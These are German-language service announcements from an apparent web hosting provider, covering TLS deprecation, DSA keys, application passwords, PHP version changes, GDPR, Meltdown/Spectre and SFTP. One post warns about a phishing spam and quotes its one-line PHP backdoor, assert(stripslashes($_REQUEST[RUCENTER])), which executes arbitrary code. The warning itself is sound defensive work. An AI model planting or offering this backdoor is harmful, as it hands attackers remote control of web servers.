Auslaufen der Unterstützung von TLS 1.0 und TLS 1.1

HTTPS

Seit Anfang dieses Jahres haben die bekannten Web-Browser Chrome , Firefox, Safari, Internet Explorer und Edge begonnen, die Unterstützung der mittlerweile veralteten TLS-Versionen 1.0 und 1.1 einzustellen. Das TLS-Protokoll (früher SSL) wird zum verschlüsselten Webseitenabruf (HTTPS) und für den verschlüsselten Versand und Abruf von E-Mails genutzt.

Die TLS-Versionen 1.0 und 1.1 weisen diverse Sicherheitsprobleme auf und sollten nicht mehr genutzt werden. Wir werden daher die Unterstützung dieser TLS-Versionen auf unseren Webservern zum 15. Februar 2020 einstellen. Ab diesem Zeitpunkt werden für HTTPS-Verbindungen zu unseren Webservern nur noch die aktuellen und sicheren TLS-Versionen 1.2 und 1.3 unterstützt. Für E-Mail-Dienste (SMTP, POP3, IMAP) werden wir die veralteten TLS-Versionen zu einem späteren Zeitpunkt deaktivieren, da die Sicherheitsprobleme hauptsächlich HTTPS betreffen.

Mögliche Probleme

Alle modernen Web-Browser unterstützen die aktuelle TLS-Version 1.3. Die Vorgängerversion TLS 1.2 wurde bereits im Jahr 2008 vorgestellt, daher wird sie auch von etwas älteren Betriebssystemen und Web-Browsern unterstützt.

Nur bei sehr alten Browsern und Betriebssystemen (z.B. Windows XP, Android 4.3, iOS 4, OS X Yosemite) kann es durch die Deaktivierung von TLS 1.0 und 1.1 zu Problemen bei HTTPS-Verbindungen kommen.

Sie können bei ssllabs.com prüfen, ob Ihr Browser eine aktuelle TLS-Version unterstützt.

Kunden mit eigenem Webserver (Reseller.Dedicated bzw. Pro.Hosting-Paket ab Pro.B), sowie Nutzer unserer Legacy-Server für alte PHP-Versionen können auf Wunsch weiterhin TLS 1.0 und 1.1 für HTTPS nutzen, falls dies für die Kompatibilität mit älteren Browsern erforderlich sein sollte. Bitte wenden Sie sich dazu an unsere Kundenbetreuung.

Einstellung der Unterstützung für SSH DSA Schlüssel

Mit dem anstehenden Update unserer Webserver-Plattform auf Ubuntu 18.04 geht ein Wechsel auf eine aktuellere Version der SSH Server-Software OpenSSH einher. Dadurch können jedoch keine SSH DSA-Schlüssel mehr genutzt werden, weil diese als nicht ausreichend sicher angesehen werden, und daher von aktuellen OpenSSH-Versionen nicht mehr unterstützt werden.

Falls Sie DSA-Schlüssel auf unseren Webservern für SSH oder SFTP nutzen, sollten Sie diese durch moderne Verfahren ersetzen. Sie können diese veralteten Schlüssel am Dateinamen id_dsa bzw. id_dsa.pub oder am Präfix ssh-dss in der authorized_keys-Datei erkennen.

Wir empfehlen die Nutzung von Ed25519- oder RSA-Schlüsseln, ECDSA-Schlüssel werden ebenfalls weiter unterstützt.

Application Passwords – mehrere Passwörter für ein E-Mail-Konto

Ab sofort lassen sich im Kundenmenü mehrere Passwörter für ein E-Mail-Konto einrichten. Dies ermöglicht zum Beispiel eine Zuordnung verschiedener Benutzer und / oder verschiedener Clients, die auf ein E-Mail-Konto zugreifen können.

Ansicht von Application Passwords im Kundenmenü
Ansicht von Application Passwords im Kundenmenü

Der Grundgedanke ist, dass ein Passwort niemals mehrfach verwendet werden sollte – nicht bei verschiedenen Diensten, nicht auf mehreren Geräten und nicht von mehreren Benutzern.

So können Sie bei der Einrichtung eines neuen Smartphones für genau dieses Gerät ein Passwort für das gewünschte E-Mail-Konto anlegen. Wenn jedes Gerät ein eigenes Kennwort nutzt (und speichert), müssen Sie dieses Kennwort auch nicht kennen oder selbst notieren; es kann besonders lang und damit sicher sein. Stellt sich heraus, dass sich zum Beispiel auf Ihrem Desktop-PC ein Trojaner befindet, der das im E-Mail-Programm gespeicherte Kennwort ausgelesen hat, müssen Sie nur dieses Kennwort entfernen – alle anderen Geräte oder Programme können weiterhin ihr eigenes Kennwort benutzen.

Es gibt auch weiterhin ein Hauptkennwort für ein E-Mail-Postfach. Sie können dieses Kennwort neu setzen und selbst bestimmen. Das Hauptkennwort wird zum Beispiel benötigt, um in unserem Menü für E-Mail-Einstellungen automatische Abwesenheitsmeldungen, Spam-Filter-Optionen oder zusätzliche Weiterleitungsziele einzustellen.

Anzeige des Passworts nach der Einrichtung
Anzeige des Passworts nach der Einrichtung

Application Passwords werden automatisch erstellt sind nicht änderbar. Wir möchten damit sicherstellen, dass sie individuell und sicher sind. Die Passwörter sind explizit dafür gedacht, in Geräten oder Programmen gespeichert zu werden – Sie müssen sie sich also nicht merken. Im Kundenmenü wird zudem angezeigt, wann und von wem ein Application Password erstellt oder gelöscht wurde. Auf diese Weise können Sie zum Beispiel auch einem Administrator zur Lösung eines Problems ein vorrübergehendes Kennwort einrichten, das Sie nach dem Ende der Arbeit wieder entfernen können – ohne dass Sie ein Kennwort auf verschiedenen Geräten ändern müssten.

Mit der Einführung von Application Passwords bieten wir ein Feature an, das es sonst nur bei sehr spezialisierten E-Mail-Hostern gibt. Wir würden uns über eine intensive Nutzung der Application Passwords freuen – sie tragen ganz erheblich zu mehr Sicherheit für das eigene E-Mail-Konto bei.

Deaktivierung von PHP 5.2, 5.3 und 5.5

Im April 2019 werden wir beginnen, unsere Webserver auf eine neue Linux-Distribution zu aktualisieren, um auch weiterhin den höchsten Sicherheitsstandards und Performance-Ansprüchen genügen zu können. Aufgrund von Inkompatibilitäten zwischen älteren PHP-Versionen und den von der Distribution bereitgestellten aktuellen Versionen von Standard-Softwarebibliotheken wie OpenSSL können wir auf der neuen Webserver-Plattform nur PHP-Versionen ab 5.6 anbieten.

Wir werden PHP 5.2 zum 15.04.2019, sowie PHP 5.3 und PHP 5.5 zum 15.05.2019 auf allen Webservern abschalten. Alle Kunden, die diese PHP-Versionen noch verwenden, erhalten von uns in den nächsten Tagen eine entsprechende Mitteilung mit konkreten Hinweisen, wo und wie diese Versionen noch verwendet werden.

Die Pflege der PHP-Versionen 5.2, 5.3 und 5.5 wurde durch das PHP-Entwicklerteam bereits 2012, 2014 bzw. 2016 eingestellt. Wir haben diese Versionen auf unseren Webservern nur aus Kompatibilitätsgründen mit älteren Web-Anwendungen weiterhin bereitgestellt. Dies ist nun auf der neuen Webserver-Plattform nicht mehr möglich.

Uns ist bewusst, dass es Skripte, Content-Management-Systeme und Shops gibt, die seit langer Zeit nicht aktualisiert wurden und nur mit PHP 5.2, 5.3 oder 5.5 funktionieren. Nicht immer ist eine Aktualisierung oder Anpassung mit wenig Aufwand möglich. Wir werden daher Kunden, die diese PHP-Versionen auch nach der Abschaltung benutzen müssen, einen speziell konfigurierten Webserver zur Verfügung stellen.

Da der Betrieb dieses Servers hohe Kosten verursacht, die sich auf wenige Kunden verteilen, werden wir nach einer kostenlosen Übergangsphase bis zum 15.07.2019 (PHP 5.2) bzw. 15.08.2019 (PHP 5.3/5.5) für die Nutzung einen monatlichen Aufpreis berechnen. Die Höhe des Aufpreises hängt von der Zahl der Kunden ab, die den „Legacy-Server“ nach Ende der Übergangsphase noch benötigen. Wir rechnen zurzeit mit einem Preis von etwa 10,- Euro pro Monat pro Benutzeraccount.

Sollten Sie bei der Umstellung auf eine neuere Version Hilfe benötigen, lassen Sie es uns bitte wissen. Wenn sich herausstellt, dass Sie für eine bestimmte Webseite oder Anwendung zwingend weiterhin PHP 5.2, PHP 5.3 bzw. 5.5 benötigen, kontaktieren Sie uns bitte nach dem Erhalt unserer E-Mail, um die Migration auf den Legacy-Server zu koordinieren.

In unseren FAQ finden Sie einige häufige Fragen zur geplanten Abschaltung der älteren PHP-Versionen.

PHP 7.3 verfügbar

PHPAuf unseren Webservern steht ab sofort die heute neu erschienene PHP-Version 7.3 zur Verfügung.

Wir haben die seit Mitte September erschienenen Release-Candidate-Versionen bereits zu Testzwecken auf allen Webservern installiert, nun ist die finale Version 7.3.0 verfügbar und kann für den Produktivbetrieb genutzt werden.

Änderungen zur Vorgängerversion PHP 7.2

Grundsätzlich fallen die Änderungen im Vergleich zur Vorgängerversion PHP 7.2 eher geringfügig aus, so dass viele Web-Anwendungen bereits mit PHP 7.3 kompatibel sind, oder nur kleinere Anpassungen erfordern. Eine Übersicht über alle Änderungen finden Sie hier.

Nutzer des beliebtesten Content-Management-Systems WordPress sollten vor der Umstellung auf PHP 7.3 ein Update auf die ebenfalls heute erschienene WordPress-Version 5.0 vornehmen, die einige kleinere Kompatiblitätsprobleme mit PHP 7.3 behebt.

Verbesserungen in PHP 7.3

Für Endanwender besonders interessant sind mögliche Geschwindigkeitsvorteile bei der Ausführung von PHP-Scripts, wir konnten hier in unseren bisherigen Tests einen kleinen Vorteil von etwa 5% gegenüber der Vorgängerversion PHP 7.2 feststellen. Durch einen Umstieg auf PHP 7.3 lässt sich die Seitenladezeit also leicht reduzieren, was häufig zu einer besseren Seitenbewertung durch Suchmaschinen führt.

PHP 7.3 aktivieren

Sie können PHP 7.3 für Ihre Webseiten wie üblich über unser Kundenmenü oder per .htaccess-Datei mittels folgender Direktive aktivieren:

AddHandler application/x-httpd-php73 .php

Kunden, die PHP-FPM nutzen, können eine Umstellung auf PHP 7.3 formlos per E-Mail beauftragen.

Hinweise zu den unterstützten PHP-Versionen

Die PHP-Versionen 5.2, 5.3 und 5.5 sind seit mehreren Jahren veraltet und sollten nicht mehr genutzt werden. Für die PHP-Versionen 5.6 und 7.0 sind heute die voraussichtlich letzten Updates erschienen, die Pflege dieser Versionen wird von den PHP-Entwicklern zum Jahresende eingestellt.

Diese älteren PHP-Versionen stehen auch weiterhin auf unseren Webservern zur Verfügung, sie können jedoch kritische Sicherheitslücken aufweisen, die nicht mehr im Rahmen regelmäßiger Updates behoben werden. Sie sollten für Ihre Webseiten daher nach Möglichkeit die aktuell unterstützten PHP-Versionen 7.1, 7.2 oder 7.3 verwenden.

Beachten Sie bitte, dass wir die für bestehende Webseiten genutzte PHP-Version unsererseits nicht ändern, da es zu Kompatibilitätsproblemen mit älteren Web-Anwendungen kommen kann. Falls Sie bereits seit mehreren Jahren bei uns Kunde sind, nutzen Ihre Webseiten wahrscheinlich eine mittlerweile veraltete PHP-Version und Sie sollten nach Möglichkeit eine aktuellere PHP-Version auswählen (wir empfehlen PHP 7.2). Eine Anleitung zur Änderung der PHP-Version finden Sie in unseren FAQ.

Was ändert sich durch die DSGVO?

Am Freitag, den 25.05.2018 tritt die neue EU-Datenschutzgrundverordnung (DSGVO / englisch: GDPR) in Kraft. Für Verbraucher bringt die DSGVO viel Gutes mit: Es gibt ein Recht auf Datenlöschung, ein Recht auf Widerspruch und ein Auskunftsrecht. Umfangreiche Informationspflichten sollen Transparenz bei der Datenverarbeitung sicherstellen. Das Prinzip der Datensparsamkeit steht künftig an oberster Stelle – nur Daten, die tatsächlich für die Erfüllung einer Aufgabe benötigt werden, dürfen erhoben, gespeichert und verarbeitet werden.

Leider bringen neue Gesetze oft auch eine Menge neuer Bürokratie mit sich. Besonders kleine Unternehmen und auch Privatpersonen mit eigenen Webseiten fühlen sich von den umfangreichen DSGVO-Regelungen überfordert. Wir möchten Ihnen in diesem Artikel einen kleinen Überblick darüber geben, was sich durch die DSGVO für die meisten unserer Kunden ändert und an welcher Stelle unsere Dienste mit der DSGVO in Berührung kommen. Der Artikel kann keine Rechtsberatung ersetzen und erhebt auch nicht den Anspruch, vollumfänglich über die DSGVO zu informieren – das ist angesichts der Fülle der Regeln kaum möglich.

Was muss ich als Betreiber einer Webseite beachten?

SSL-Zertifikate: Sobald Sie irgendeine Art von personenbezogenen Daten auf Ihrer Webseite erfassen – sei es über ein Kontaktformular, eine Newsletter-Anmeldung, einen Online-Shop oder sonstige Funktionen, bei denen ein Nutzer Ihnen gegenüber etwas Preis gibt, muss die jeweilige Webseite über ein SSL-Zertifikat (https://…) abgesichert werden. In vielen unserer Hosting-Pakete sind SSL-Zertifikate im Preis bereits enthalten; zusätzliche Zertifikate können ab 6,- Euro pro Jahr (Reseller: 3,- Euro pro Jahr) gebucht werden. Informationen zu den Unterschieden verschiedener Zertifikatstypen finden Sie auf unserer Webseite. Die Bestellung eines Zertifikats erfolgt formlos per E-Mail.

Datenschutzerklärung: Sie müssen in einer Datenschutzerklärung auf Ihrer Webseite angeben, wie Sie mit den Daten Ihrer Besucher umgehen. In erster Linie geht es dabei darum, welche Daten Sie (oder wir als Ihr Webhoster) von den Besuchern Ihrer Webseite speichern. Zur Erstellung einer DSGVO-konformen Datenschutzerklärung gibt es zahlreiche kostenlose und kostenpflichtige Generatoren im Internet; im Zweifelsfall konsultieren Sie bitte unbedingt einen Juristen. Bezüglich der von uns erstellten Logdateien ist wichtig, welche Daten wir serverseitig speichern. Bitte beachten Sie dazu folgende FAQ-Artikel: Wie lange werden die Logdateien aufbewahrt? und Wie sind die HTTP Access Logs aufgebaut?

Auftragsverarbeitungsvertrag: Als gewerblicher Betreiber einer Webseite sollten Sie mit uns einen Auftragsverarbeitungsvertrag abschließen. In diesem Vertrag ist geregelt, wie wir Ihre und die Daten Ihrer Kunden auf unseren Servern verarbeiten. Bestandteil des AV-Vertrags sind die „Technischen und organisatorischen Maßnahmen“, die wir anwenden, um Ihre Daten zu schützen. Der Abschluss eines AV-Vertrags mit uns ist hier unter Verwendung Ihrer persönlichen Zugangsdaten zum Kundenmenü möglich.

An dieser Stelle noch einmal der Hinweis: Diese Übersicht ist nicht vollständig. Je nach Branche und Art der Weise, wie Sie Daten erheben und verarbeiten, können und werden noch weitere Themen für Sie relevant sein, auf die wir hier nicht eingehen können.

Was ändert sich bei der Domainregistrierung?

Whois-Daten: Bei der Registrierung einer Domain wurden bisher bei den meisten Registrierungsstellen umfangreiche Daten des Domaininhabers, des administrativen Ansprechpartners und der technischen Kontakte abgefragt, darunter auch E-Mail-Adressen und Telefonnummern. Diese Daten wurden allerdings nicht nur bei den Registrierungsstellen gespeichert, sondern auch im öffentlichen Whois angezeigt. An beiden Punkten gibt es durch die DSGVO nun Änderungen. Einige Registrierungsstellen erfassen nur noch die Daten eines Domaininhabers; sowohl der administrative als auch der technische Kontakt entfällt bei diesen Top-Level-Domains (z.B. .de). Andere Registrierungsstellen erfassen weiterhin alle Daten, veröffentlichen im Whois aber nur noch einen kleinen Teil davon. Bei den meisten Top-Level-Domains wird im Falle einer Registrierung für eine Organisation der Name der Organisation und das Land, in dem die Organisation ihren Sitz hat, im Whois angezeigt. Bei Privatpersonen wird nur noch das Land des Inhabers angezeigt.

Vermittlung: Wie bisher kommt der Vertrag für eine Domainregistrierung zwischen dem Domaininhaber und der Registrierungsstelle zustande. Wir vermitteln diesen Vertrag und verwalten die Domains für Sie bei der Registrierungsstelle. Nach wie vor übermitteln wir Ihre Daten – je nach Top-Level-Domain – auch an Drittstaaten. Diese Übermittlung ist jedoch zwingende Voraussetzung dafür, die gewünschte Domain registrieren zu können.

PayPal Umstellung auf TLS 1.2 und HTTP/1.1

Ab Juli 2018 stellt der Zahlungsanbieter PayPal die Unterstützung der mittlerweile veralteten TLS-Versionen 1.0 und 1.1 ein. Weiterhin setzt PayPal dann zwingend das HTTP-Protokoll ab Version 1.1 voraus, ältere Versionen wie 1.0 werden nicht mehr unterstützt.

Webshops, die PayPal als Zahlungsmethode anbieten, und dabei direkt auf eine PayPal-Schnittstelle zugreifen (z.B. Instant Payment Notification), müssen bis dahin auf die aktuelle TLS-Version 1.2 sowie HTTP/1.1 umgestellt werden. Die meisten Webshops greifen auf die PayPal-Schnittstellen mittels libcurl zu, dabei wird auf unseren Webservern standardmäßig HTTP/1.1 und TLS 1.2 genutzt. Manche Webshops nutzen jedoch nicht die Standardeinstellungen von libcurl, sondern setzen ausdrücklich eine ältere TLS Version wie 1.0. Dies wird zukünftig zu Problemen führen.

PayPal informiert betroffene Kunden aktuell per E-Mail, diese müssen bis zum Juli 2018 ein Update der Webshop-Software bzw. des PayPal Zahlungsmoduls vornehmen.

Falls Sie noch einen älteren WebShop betreiben, und keine Updates für das PayPal-Zahlungsmodul bereitstehen, müssen Sie ggf. den PHP-Quellcode anpassen. Suchen Sie dazu nach allen PHP-Dateien, in denen die Zeichenfolgen „curl_setopt“ und „TLSv1“ vorkommen, und kommentieren diese in einem Text-Editor mittels vorangestelltem // aus. Sie können die betroffenen Dateien mit den entsprechenden Stellen im Quellcode über folgenden SSH-Befehl ermitteln:

find . -name "*.php" -exec grep "curl_setopt(.*TLSv1" {} \; -print

Informationen zu den Sicherheitslücken Meltdown und Spectre

Seit einigen Tagen wird in den Medien verstärkt über schwere Sicherheitslücken in häufig genutzten CPUs für PCs, Smartphones und Tablets berichtet.

Die Meltdown genannte Sicherheitslücke ermöglicht das Auslesen des gesamten Arbeitsspeichers, die Spectre genannte Sicherheitslücke ermöglicht das Auslesen des Arbeitsspeichers eines Prozesses. Beide Sicherheitslücken erfordern die Ausführung von speziellem Schadcode, Angreifer könnten so Zugriff auf vertrauliche Daten wie Passwörter oder E-Mails erhalten.

Auswirkungen auf unsere Dienste

Da ein Angreifer zur Ausnutzung dieser Sicherheitslücken eigenen Schadcode ausführen muss, lassen sich beide Sicherheitslücken theoretisch auf unseren Webservern ausnutzen, andere Dienste wie E-Mail oder MySQL sind jedoch nicht betroffen.

Meltdown

Die Meltdown-Sicherheitslücke kann auf unseren Webservern nicht ausgenutzt werden, da sie nur Intel-CPUs betrifft, die wir gegenwärtig nicht für Webserver einsetzen.

Spectre

Die Spectre-Sicherheitslücke kann zumindest in einer Variante auf unseren Webservern ausgenutzt werden (bounds check bypass, CVE-2017-5753), es können dadurch aber nur eigene Benutzerprozesse angegriffen werden, jedoch keine Systemdienste oder Prozesse von anderen Webserver-Benutzern. Die Ausnutzung dieser Sicherheitslücke durch einen Angreifer setzt voraus, dass dieser über eine anderweitige Sicherheitslücke in einer Web-Anwendung (z.B.  veraltete Installationen eines Content-Management-Systems) oder ausgespähte Zugangsdaten eigenen Code auf dem Webserver ausführen kann. In diesem Fall hat ein Angreifer jedoch ohnehin Zugriff auf sämtliche Daten eines Webserver-Benutzers, daher tritt durch Spectre keine zusätzliche Verschlimmerung ein.

Eine zumindest theoretisch möglicher Angriff betrifft Kunden, die PHP-FPM nutzen. Dort könnte unter Umständen auf den im Arbeitsspeicher hinterlegten OpCode-Cache von PHP-FPM, der von mehreren Webserver-Benutzern geteilt wird, zugegriffen werden. Ein solcher Angriff wäre jedoch – sofern überhaupt möglich – sehr komplex, da der betroffene Speicherbereich nicht direkt ausgelesen wird, sondern durch einen sogenannten Seitenkanal Rückschlüsse auf den Speicherinhalt gezogen werden. Auf einem Webserver, wo ständig viele gleichzeitige Prozesse laufen, ist dieser Angriff sehr fehleranfällig, so dass wir momentan von einem relativ geringen Risiko ausgehen.

Die Spectre-Sicherheitslücke lässt sich jedoch auch über JavaScript-Schadcode im Web-Browser ausnutzen, daher sollten Sie die von Ihnen genutzten Web-Browser aktualisieren und die aktuellen Systemupdates für Ihre Smartphones und Tablets installieren.

Update (12.1.)

Es ist momentan noch immer unklar, inwiefern Spectre eine relevantes Sicherheitsrisiko für unsere Webserver darstellt. Die bisher bekannten erfolgreichen Angriffe mittels Spectre stellen auf unseren Systemen keine Gefahr da, es könnten jedoch zukünftig neue Angriffe entwickelt werden, die dann auch unsere Webserver betreffen.

Um die Spectre-Sicherheitslücke zu schließen, sind Microcode-Updates für die CPUs sowie Kernel-Updates für das Betriebssystem erforderlich. Diese Updates sind momentan noch nicht für alle von uns genutzten CPU-Typen verfügbar, sie werden voraussichtlich gegen Ende Januar bereitstehen.

Gefährlicher Spam an Inhaber von .ru-Domains

Wir erhielten heute von einem Kunden eine betrügerische Spam-Mail zur Prüfung, die momentan an Inhaber von .ru-Domains versendet wird. Diese stammt vorgeblich von der Registrierungsstelle RU-CENTER und enthält die Aufforderung, eine PHP-Datei mit folgendem Inhalt auf dem Webserver anzulegen:

<?php
 assert(stripslashes($_REQUEST[RUCENTER]));
 ?>

Dieser PHP-Befehl würde es Angreifern ermöglichen, beliebige PHP-Befehle auf dem Webserver auszuführen, so könnten beispielsweise Webseiten verändert oder Spam versendet werden.

Es gibt tatsächlich Dienste, bei denen es erforderlich ist, einen bestimmten Code auf die eigene Webseite einzufügen – zum Beispiel um bestimmte Funktionen zu ermöglichen oder die Inhaberschaft einer Domain zu validieren, z.B. die Google Webmaster Tools, Piwik und viele mehr. Sie bekommen eine entsprechende Nachricht aber nur dann, wenn Sie diesen Dienst explizit nutzen wollen und sich dort angemeldet haben. In der Regel versenden diese Dienste auch keine E-Mail, sondern der einzufügende Code wird Ihnen beim Anmeldeprozess angezeigt. Zudem handelt es sich in solchen Fällen auch nie um PHP-Befehle. Wenn Sie eine solche E-Mail unaufgefordert erhalten, handelt es sich fast immer um Spam.

Wir sind froh, dass der Kunde sich an uns gewandt hat und können nur alle Kunden ermuntern, im Zweifelsfall lieber nachzufragen.

SFTP für virtuelle FTP-Benutzer

Bisher konnten virtuelle FTP-Benutzer nur unverschlüsselte FTP-Verbindungen und kein verschlüsseltes SFTP nutzen, dies war nur für den FTP-Hauptbenutzer möglich. Da unverschlüsselte FTP-Verbindungen aus Sicherheitsgründen nicht mehr benutzt werden sollten, bieten wir ab sofort SFTP auch für virtuelle FTP-Benutzer über den TCP-Port 2222 an. Für weitere Informationen beachten Sie bitte den zugehörigen FAQ-Artikel.

Hintergründe

Der SFTP-Dienst wurde bisher nicht mittels des von uns für FTP-Verbindungen genutzten Dienstes ProFTPD realisiert, sondern über den SSH-Dienst OpenSSH, der im Gegensatz zu ProFTPD keine virtuellen Benutzer unterstützt. ProFTPD unterstützt zwar grundsätzlich auch SFTP-Verbindungen, allerdings kann OpenSSH nicht einfach durch ProFTPD ersetzt werden, da OpenSSH noch weitere Funktionen wie z.B. eine Login-Shell bereit stellt, auf die wir nicht verzichten können. Weiterhin war die SFTP-Unterstützung in ProFTPD in der Vergangenheit noch sehr fehlerbehaftet, es kam z.B. häufig zu Problemen beim Verbindungsaufbau. In der aktuellen ProFTPD-Version sind diese Fehler jedoch weitgehend behoben, so dass einem Produktiveinsatz nun nichts mehr im Wege steht.

Um SFTP für virtuelle FTP-Benutzer zu realisieren, nutzen wir den TCP-Port 2222, da der Standard-Port 22 bereits vom SSH-Dienst belegt ist. Sie können SFTP-Verbindungen sowohl für den FTP-Hauptbenutzer als auch für alle virtuellen Benutzer über diesen Port nutzen (der FTP-Hauptbenutzer kann jedoch auch weiter den Standard-Port 22 für SFTP nutzen).